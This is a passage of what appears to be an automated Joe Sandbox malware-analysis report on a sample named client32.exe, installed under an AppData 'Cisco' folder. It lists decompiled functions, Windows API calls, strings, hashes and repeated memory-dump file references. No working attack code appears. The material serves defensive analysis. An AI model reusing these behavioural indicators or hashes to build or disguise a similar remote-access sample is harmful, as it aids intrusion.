                                                                                                                                        • Instruction ID: 9819fa70e1002b3fd3fc9294db2adb66ebff135fc09b7afae45472fde2869809
                                                                                                                                        • Opcode Fuzzy Hash: 63dd30d7ff77dec508e51da4baa18de7bde6bf43051e4c425e199e23d5428a19
                                                                                                                                        • Instruction Fuzzy Hash: BA21E474E41765ABE711CFD4CD46FAABBE5E708B08F0042AAF9159B3C0E7B574008B84
                                                                                                                                        Function 11026E20 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 53windowCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetMessageA.USER32(?,00000000,00000000,00000000), ref: 11026E4A
                                                                                                                                          • Part of subcall function 110CBDD0: EnterCriticalSection.KERNEL32(00000000,00000000,7694A1D0,76933760,76937A80,110F2499,?,?,?,?,?,?,?,?,110FFF09), ref: 110CBDEB
                                                                                                                                          • Part of subcall function 110CBDD0: SendMessageA.USER32(00000000,00000476,00000000,00000000), ref: 110CBE18
                                                                                                                                          • Part of subcall function 110CBDD0: SendMessageA.USER32(00000000,00000475,00000000,?), ref: 110CBE2A
                                                                                                                                          • Part of subcall function 110CBDD0: LeaveCriticalSection.KERNEL32(?,?,?,?,?,?,?,?,110FFF09), ref: 110CBE34
                                                                                                                                        • TranslateMessage.USER32(?), ref: 11026E60
                                                                                                                                        • DispatchMessageA.USER32(?), ref: 11026E66
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Message$CriticalSectionSend$DispatchEnterLeaveTranslate
                                                                                                                                        • String ID: Exit Msgloop, quit=%d
                                                                                                                                        • API String ID: 3212272093-2210386016
                                                                                                                                        • Opcode ID: e7dd9a0d6304e414837417c1496cf95b9c492c7d0ab5e24ee8a9f5cb138c621a
                                                                                                                                        • Instruction ID: e73fb029a48cead8081619cba9071100042b7f6ca482b6c8c9150014965f5db6
                                                                                                                                        • Opcode Fuzzy Hash: e7dd9a0d6304e414837417c1496cf95b9c492c7d0ab5e24ee8a9f5cb138c621a
                                                                                                                                        • Instruction Fuzzy Hash: A001D476E0125E66EB12DBF5DC81F6FB7AD5B84718F904075EF1493189FB60B00487A2
                                                                                                                                        Function 1110C420 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 40COMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • wsprintfA.USER32 ref: 1110C454
                                                                                                                                          • Part of subcall function 110290F0: GetLastError.KERNEL32(?,?), ref: 1102910C
                                                                                                                                          • Part of subcall function 110290F0: wsprintfA.USER32 ref: 11029157
                                                                                                                                          • Part of subcall function 110290F0: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029193
                                                                                                                                          • Part of subcall function 110290F0: ExitProcess.KERNEL32 ref: 110291A9
                                                                                                                                        • _memset.LIBCMT ref: 1110C477
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: wsprintf$ErrorExitLastMessageProcess_memset
                                                                                                                                        • String ID: ..\ctl32\Refcount.cpp$Can't alloc %u bytes
                                                                                                                                        • API String ID: 1322847840-2664294811
                                                                                                                                        • Opcode ID: a576ef4d6bf1e759db3b76f41edd7605ec7ec58c3f4389ecd7df5ee8d45879ec
                                                                                                                                        • Instruction ID: 8eb050f01703c0127fa8cf99996688d7a4adf3630a2635e654b6d504aebe3ff0
                                                                                                                                        • Opcode Fuzzy Hash: a576ef4d6bf1e759db3b76f41edd7605ec7ec58c3f4389ecd7df5ee8d45879ec
                                                                                                                                        • Instruction Fuzzy Hash: 67F0FCB5D0113867C6119EA9AD41FAFF77C9F81604F0001A9FF04A7241D6346A01C7D5
                                                                                                                                        Function 11017610 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetTickCount.KERNEL32 ref: 1101761D
                                                                                                                                          • Part of subcall function 11017520: WaitForSingleObject.KERNEL32(0000031C,000000FF), ref: 1101755C
                                                                                                                                          • Part of subcall function 11017520: CoInitialize.OLE32(00000000), ref: 11017565
                                                                                                                                          • Part of subcall function 11017520: CoUninitialize.COMBASE(00000001,?,?), ref: 110175F0
                                                                                                                                          • Part of subcall function 11017440: WaitForSingleObject.KERNEL32(0000031C,000000FF), ref: 11017472
                                                                                                                                          • Part of subcall function 11017440: CoInitialize.OLE32(00000000), ref: 1101747B
                                                                                                                                          • Part of subcall function 11017440: CoUninitialize.COMBASE(00000001,?,?), ref: 11017500
                                                                                                                                        • SetEvent.KERNEL32(0000031C), ref: 1101763D
                                                                                                                                        • GetTickCount.KERNEL32 ref: 11017643
                                                                                                                                        Strings
                                                                                                                                        • touchkbd, systype=%d, chassis=%d, took %d ms, xrefs: 1101764D
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CountInitializeObjectSingleTickUninitializeWait$Event
                                                                                                                                        • String ID: touchkbd, systype=%d, chassis=%d, took %d ms
                                                                                                                                        • API String ID: 3357037191-4122679463
                                                                                                                                        • Opcode ID: 6fb4c883c76aea1f2d5b3d6f188dc251cbcdc853b11f71871790596908a8fc6c
                                                                                                                                        • Instruction ID: 79165456b83758217f0e3ba606bc8870e55e265f2da5a0662fe20fec16fd047e
                                                                                                                                        • Opcode Fuzzy Hash: 6fb4c883c76aea1f2d5b3d6f188dc251cbcdc853b11f71871790596908a8fc6c
                                                                                                                                        • Instruction Fuzzy Hash: B4F0A0B2E00218ABD700EBF99C89EAEBB9CDB4431CB100076F904C7245E9A2BD1047B2
                                                                                                                                        Function 688F4FB0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32libraryloaderCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,EnumProcessModules), ref: 688F4FC4
                                                                                                                                        • K32EnumProcessModules.KERNEL32(00000FA0,?,00000000,688F8E0D,00000000,?,688F8E0D,00000000,?,00000FA0,?), ref: 688F4FE4
                                                                                                                                        • SetLastError.KERNEL32(00000078,00000000,?,688F8E0D,00000000,?,00000FA0,?), ref: 688F4FED
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressEnumErrorLastModulesProcProcess
                                                                                                                                        • String ID: EnumProcessModules
                                                                                                                                        • API String ID: 3858832252-3735562946
                                                                                                                                        • Opcode ID: 163dd75da5aa06be30273b6e343809b86af139058f21c4a7e1825325fe79d846
                                                                                                                                        • Instruction ID: cc670707fb0326ac8e6273fbe32c0554f95f656a0fb169916baa129c6dc9eb41
                                                                                                                                        • Opcode Fuzzy Hash: 163dd75da5aa06be30273b6e343809b86af139058f21c4a7e1825325fe79d846
                                                                                                                                        • Instruction Fuzzy Hash: F4F08C72604228AFC720DFA4D844E9B77E8EF88761F00C82AF95AD7640C670EC10CFA0
                                                                                                                                        Function 688F5000 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32libraryloaderCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetProcAddress.KERNEL32(?,GetModuleFileNameExA), ref: 688F5014
                                                                                                                                        • K32GetModuleFileNameExA.KERNEL32(00000FA0,?,00000000,00000104,00000000,?,688F8E50,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 688F5034
                                                                                                                                        • SetLastError.KERNEL32(00000078,00000000,?,688F8E50,00000000,?,?,00000104,00000000,?,00000FA0,?), ref: 688F503D
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressErrorFileLastModuleNameProc
                                                                                                                                        • String ID: GetModuleFileNameExA
                                                                                                                                        • API String ID: 4084229558-758377266
                                                                                                                                        • Opcode ID: ee13a36e4215620edff9456240f046e41ef6af5ef05618045e6d23f50826d4e8
                                                                                                                                        • Instruction ID: 2cd7af650b9aea6e9b1f9e89ad73a0fd33336178f1cbe2f04d083f4b65503af5
                                                                                                                                        • Opcode Fuzzy Hash: ee13a36e4215620edff9456240f046e41ef6af5ef05618045e6d23f50826d4e8
                                                                                                                                        • Instruction Fuzzy Hash: 69F05E72604328AFC720CF94E844A5B77E8EF88750F00891AF95697640C671E810CBA1
                                                                                                                                        Function 11134C80 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 27threadCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 1105D340: __wcstoi64.LIBCMT ref: 1105D37D
                                                                                                                                        • CreateThread.KERNEL32(00000000,00001000,Function_00134AC0,00000000,00000000,11135C92), ref: 11134CBE
                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,11135C92,AutoICFConfig,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 11134CC5
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseCreateHandleThread__wcstoi64
                                                                                                                                        • String ID: *AutoICFConfig$Client
                                                                                                                                        • API String ID: 3257255551-59951473
                                                                                                                                        • Opcode ID: 0cfa240b01cb93660fa661b19995e9ddfd78e1b62fe40f5d5585cf7624bf5092
                                                                                                                                        • Instruction ID: 999f83b1187bc70c22231b94e5d2b365f7563141598ae0e3e9d3e8eed503f9d2
                                                                                                                                        • Opcode Fuzzy Hash: 0cfa240b01cb93660fa661b19995e9ddfd78e1b62fe40f5d5585cf7624bf5092
                                                                                                                                        • Instruction Fuzzy Hash: B8E0D8347D02087AFB119AE19C86FA9F35D9744766F500750FB21A91C4EAA06440872D
                                                                                                                                        Function 1106FD70 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 134sleepCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • Sleep.KERNEL32(000000FA), ref: 1106FDC7
                                                                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 1106FDD4
                                                                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 1106FEA6
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection$EnterLeaveSleep
                                                                                                                                        • String ID: Push
                                                                                                                                        • API String ID: 1566154052-4278761818
                                                                                                                                        • Opcode ID: dc6c7eaf6253ca0870285456ff2e45e146cbf0c95ccab866d8c44552106f2030
                                                                                                                                        • Instruction ID: f8492b55367a0abba2df78aab96abf65533029d7cee8b1effb3e7d26cba893d6
                                                                                                                                        • Opcode Fuzzy Hash: dc6c7eaf6253ca0870285456ff2e45e146cbf0c95ccab866d8c44552106f2030
                                                                                                                                        • Instruction Fuzzy Hash: F651DB75E00745DFE321CF64C8A4B86FBE9EF04714F4585AEE85A8B282D730B840CB92
                                                                                                                                        Function 688FA4E0 Relevance: 6.1, APIs: 4, Instructions: 71sleepCOMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • EnterCriticalSection.KERNEL32(6893B898,00000000,?,?,?,688FDA7F,?,00000000), ref: 688FA503
                                                                                                                                        • InterlockedExchange.KERNEL32(?,00000000), ref: 688FA568
                                                                                                                                        • Sleep.KERNEL32(00000000,?,688FDA7F,?,00000000), ref: 688FA581
                                                                                                                                        • LeaveCriticalSection.KERNEL32(6893B898,00000000), ref: 688FA5B3
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4600164507.00000000688F1000.00000020.00000001.01000000.0000000F.sdmp, Offset: 688F0000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4600020390.00000000688F0000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600206942.0000000068930000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600235942.0000000068939000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893A000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600257425.000000006893E000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4600306736.0000000068940000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_688f0000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection$EnterExchangeInterlockedLeaveSleep
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 4212191310-0
                                                                                                                                        • Opcode ID: 2da1e8e5a6792307d67863e05431705435da21dc968808dd261f548205c57407
                                                                                                                                        • Instruction ID: 7bf4ed63e0f48adc7bace38c578aef2ceddbfc59b9c6462ae1f4886614bfa605
                                                                                                                                        • Opcode Fuzzy Hash: 2da1e8e5a6792307d67863e05431705435da21dc968808dd261f548205c57407
                                                                                                                                        • Instruction Fuzzy Hash: B621AAB6904A10AFDB318F5CC84565EB7B9AF96368F410836D866A3540D371A941CB51
                                                                                                                                        Function 11140290 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMONLIBRARYCODE
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        • GetCurrentProcess.KERNEL32(00000000,?,111404E3,?), ref: 1114029C
                                                                                                                                        • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\AppData\Roaming\Cisco\client32.exe,00000104,?,111404E3,?), ref: 111402B9
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599013650.000000001118F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599072476.00000000111DD000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599137859.00000000111EC000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111F2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.00000000111FC000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011222000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011229000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001123D000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001124C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011250000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011252000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001127E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.000000001135E000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.4599180666.0000000011360000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_11000000_client32.jbxd
                                                                                                                                        Yara matches
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CurrentFileModuleNameProcess
                                                                                                                                        • String ID: C:\Users\user\AppData\Roaming\Cisco\client32.exe
                                                                                                                                        • API String ID: 2251294070-3116060180
                                                                                                                                        • Opcode ID: 4ac27037acda0d8a9245f2952244d97613c2a95504e0481259921610bf2da8af
                                                                                                                                        • Instruction ID: f66355bd66e631ef02f67cdace41a374b72edc36f1231e7adb2d1e88445570b8
                                                                                                                                        • Opcode Fuzzy Hash: 4ac27037acda0d8a9245f2952244d97613c2a95504e0481259921610bf2da8af
                                                                                                                                        • Instruction Fuzzy Hash: E011C8707052125FE706DFA6C980B6AFBE5AB84B58F20403CD919C7685DB72D841C791
                                                                                                                                        Function 110CE440 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43COMMON
                                                                                                                                        Download Yara Rule
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.4598742174.0000000011001000.00000020.00000001.01000000.0000000B.sdmp, Offset: 11000000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.4598704351.0000000011000000.00000002.00000001.01000000.0000000B.sdmpDownload File
